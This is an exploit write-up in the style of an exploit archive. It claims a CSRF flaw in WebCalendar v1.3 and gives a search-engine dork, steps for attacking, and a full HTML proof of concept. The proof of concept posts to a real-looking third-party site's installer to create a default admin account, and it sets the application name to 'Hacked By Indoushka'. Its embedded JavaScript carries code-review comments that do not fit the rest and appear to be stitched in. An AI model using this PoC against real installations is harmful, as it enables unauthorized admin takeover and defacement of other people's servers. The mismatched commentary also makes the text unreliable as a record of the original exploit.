====================================================================================================================================
| # Title     : WebCalendar v1.3 CSRF Vulnerability                                                                                |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | 
| # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip                                                         |  
| # Dork      : WebCalendar v1.3                                                                                                   |
====================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] The following HTML code creates a new admin.

[+] Go to the line 173.

[+] Set the target site link, save the changes and apply.

[+] Affected file: install/index.php (the PoC form below posts to it from another origin and carries no anti-CSRF token field).

[+] http://127.0.0.1/q7.3/admin/settings.php.

[+] Save the code as poc.html.

[+] <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
    <title>WebCalendar Setup Wizard</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <script>
<!-- <![CDATA[
      // Message table keyed by message id (an array used as a plain key/value
      // map); only 'invalidColor' is set here.
      var xlate = [];
      xlate.invalidColor = 'Invalid Color';

      /**
       * Open index.php?action=phpinfo in a separate, resizable 800x600 popup
       * window named 'wcTestPHPInfo'.
       *
       * NOTE(review): phpinfo output discloses server configuration; confirm
       * that index.php serves this action only to an authenticated installer
       * session.
       */
      function testPHPInfo() {
        var popupFeatures = 'width=800,height=600,resizable=yes,scrollbars=yes';
        var popupName = 'wcTestPHPInfo';

        window.open( "index.php?action=phpinfo", popupName, popupFeatures );
      }
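      /**
       * Check the "Application Settings" form and submit it when it is valid.
       *
       * Rules enforced: a Single-User Login is required when the 'none'
       * (single-user) authentication option is selected, and the Server URL
       * must be non-empty and end with '/'.
       *
       * NOTE(review): these checks run in the browser only. They do not protect
       * the handler that receives the POST, which has to validate the same
       * fields and verify the request (session, anti-CSRF token) on its own.
       *
       * @param {*} form Ignored; the form is always document.form_app_settings
       *   (this page calls validate() without arguments).
       * @returns {boolean|undefined} false when validation fails; undefined
       *   after form.submit() has been called.
       */
      function validate( form ) {
        var
          err = '',
          i,            // declared locally; previously leaked as an implicit global
          listid = -1,  // index of the 'none' option, -1 when there is none
          serverUrl,
          userInc;

        form = document.form_app_settings;
        userInc = form.form_user_inc;
        serverUrl = form.form_server_url;

        for( i = 0; i < userInc.length; i++ ) {
          if( userInc.options[i].value === 'none' )
            listid = i;
        }
        // Only demand a login when the single-user option exists and is chosen;
        // without the -1 sentinel a missing option fell back to option 0.
        if( listid !== -1 && userInc.options[listid].selected ) {
          if( form.form_single_user_login.value.length === 0 ) {
            // No single user login specified.
            alert( 'Error: You must specify a\nSingle-User Login.' );
            form.form_single_user_login.focus();
            return false;
          }
        }
        if( serverUrl.value === '' ) {
          err += "Server URL is required.\n";
          serverUrl.select();
          serverUrl.focus();
        }
        else if( serverUrl.value.charAt( serverUrl.value.length - 1 ) !== '/' ) {
          err += "Server URL must end with a slash(/).\n";
          serverUrl.select();
          serverUrl.focus();
        }
        if( err !== '' ) {
          alert( "Error:\n\n" + err );
          return false;
        }
        // Submit form...
        form.submit();
      }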
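      /**
       * Show the 'singleuser' row only while the 'none' (single-user)
       * authentication option is selected in document.form_app_settings.
       *
       * Relies on makeVisible()/makeInvisible(), which are not defined in this
       * script block (the page also loads ../includes/js/visible.js).
       */
      function auth_handler() {
        var
          i,            // declared locally; previously leaked as an implicit global
          listid = -1,  // index of the 'none' option, -1 when there is none
          userInc = document.form_app_settings.form_user_inc;

        for( i = 0; i < userInc.length; i++ ) {
          if( userInc.options[i].value === 'none' )
            listid = i;
        }
        // Without the -1 sentinel a missing 'none' option fell back to option 0
        // and the row followed the wrong option's state.
        if( listid !== -1 && userInc.options[listid].selected ) {
          makeVisible( 'singleuser' );
        } else {
          makeInvisible( 'singleuser' );
        }
      }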
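      /**
       * Adapt the database-name input of document.dbform to the selected
       * database type: for 'sqlite', 'sqlite3' and 'ibase' the field is widened
       * to 65 characters and labelled as a full path, otherwise it is 20 wide
       * with the plain label.
       *
       * The original condition compared an undeclared `$db_type` (apparently a
       * server-side variable that was never substituted) with 'sqlite3', which
       * throws a ReferenceError for every type other than 'sqlite'; the
       * selected value is presumably what was meant and is used instead.
       */
      function db_type_handler() {
        var
          form = document.dbform,
          label = document.getElementById( 'db_name' ),
          selectvalue = form.form_db_type.value,
          needsFullPath = selectvalue === 'sqlite'
            || selectvalue === 'sqlite3'
            || selectvalue === 'ibase';

        if( needsFullPath ) {
          form.form_db_database.size = 65;
          label.innerHTML = 'Database Name: Full Path (no backslashes)';
        } else {
          form.form_db_database.size = 20;
          label.innerHTML = 'Database Name: ';
        }
      }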
      /**
       * Reject a database password that contains '#'.
       *
       * Reads document.dbform.form_db_password; on a match it alerts the user
       * and selects and focuses the field.
       * NOTE(review): the original comment suggests a broader pattern was
       * avoided because it would reject every non-alphanumeric character.
       *
       * @returns {boolean|undefined} false when the password contains '#';
       *   undefined otherwise.
       */
      function chkPassword() {
        var passwordField = document.dbform.form_db_password;
        var hashPattern = /\#/;

        if( ! hashPattern.test( passwordField.value ) ) {
          return;
        }

        alert( 'The password contains illegal characters.' );
        passwordField.select();
        passwordField.focus();
        return false;
      }
//]]> -->
    </script>
    <script src="../includes/js/visible.js"></script>
    <style>
      body {
        margin:0;
        background:#fff;
        font-family:Arial, Helvetica, sans-serif;
      }
      table {
        border:0;
      }
      th.header,
      th.pageheader,
      th.redheader {
        background:#eee;
      }
      th.pageheader {
        padding:10px;
        font-size:18px;
      }
      th.header,
      th.redheader {
        font-size:14px;
      }
      th.redheader,
      .notrecommended {
        color:red;
      }
      td {
        padding:5px;
      }
      td.prompt,
      td.subprompt {
        padding-right:20px;
        font-weight:bold;
      }
      td.subprompt {
        font-size:12px;
      }
      div.nav {
        margin:0;
        border-bottom:1px solid #000;
      }
      div.main {
        margin:10px;
      }
      li {
        margin-top:10px;
      }
      doc.li {
        margin-top:5px;
      }
      .recommended {
        color:green;
      }
    </style>
  </head>
  <body onload="auth_handler();">
    <table border="1" width="90%" class="aligncenter">
      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>
      <tr>
        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>
      </tr>
      <th class="header" colspan="2">Application Settings</th>
      <tr>
        <td colspan="2">
          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select &#39;Web Server&#39; from the &#39;User Authentication&#39; choices below.</li></ul>
        </td>
      </tr>
      <tr>
        <td>
          <table width="75%" class="aligncenter">
            <tr>
            <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&amp;page=4" method="post" enctype='multipart/form-data' name="form_app_settings">
              <input type="hidden" name="app_settings" value="1" />
              <td class="prompt">Create Default Admin Account:</td>
              <td>
                <input type="checkbox" name="load_admin" value="Yes" />
                <span class="notrecommended"> (Admin Account Not Found)</span>
              </td>
            </tr>
            <tr>
              <td class="prompt">Application Name:</td>
              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>
            </tr>
            <tr>
              <td class="prompt">Server URL:</td>
              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>
            </tr>
            <tr>
              <td class="prompt">User Authentication:</td>
              <td>
                <select name="form_user_inc" onChange="auth_handler()">
                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>
                  <option value="http">Web Server (not detected)</option>
                  <option value="user-imap.php">IMAP</option>
                  <option value="none" >None (Single-User)</option>
                </select>
              </td>
            </tr>
            <tr id="singleuser">
              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>
              <td><input name="form_single_user_login" size="20" value="" /></td>
            </tr>
            <tr>
              <td class="prompt">Read-Only:</td>
              <td>
                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;
                <input name="form_readonly" value="false" type="radio" checked="checked" />No
              </td>
            </tr>
            <tr>
              <td class="prompt">Environment:</td>
              <td>
                <select name="form_mode">
                  <option value="prod" selected="selected">Production</option>
                  <option value="dev">Development</option>
                </select>
              </td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
    <table width="80%" class="aligncenter">
      <tr>
        <td class="aligncenter">
              <input name="action" type="button" value="Save Settings" onClick="return validate();" />
              <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />
            </form>
        </td>
      </tr>
    </table>  </body>
</html>


Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================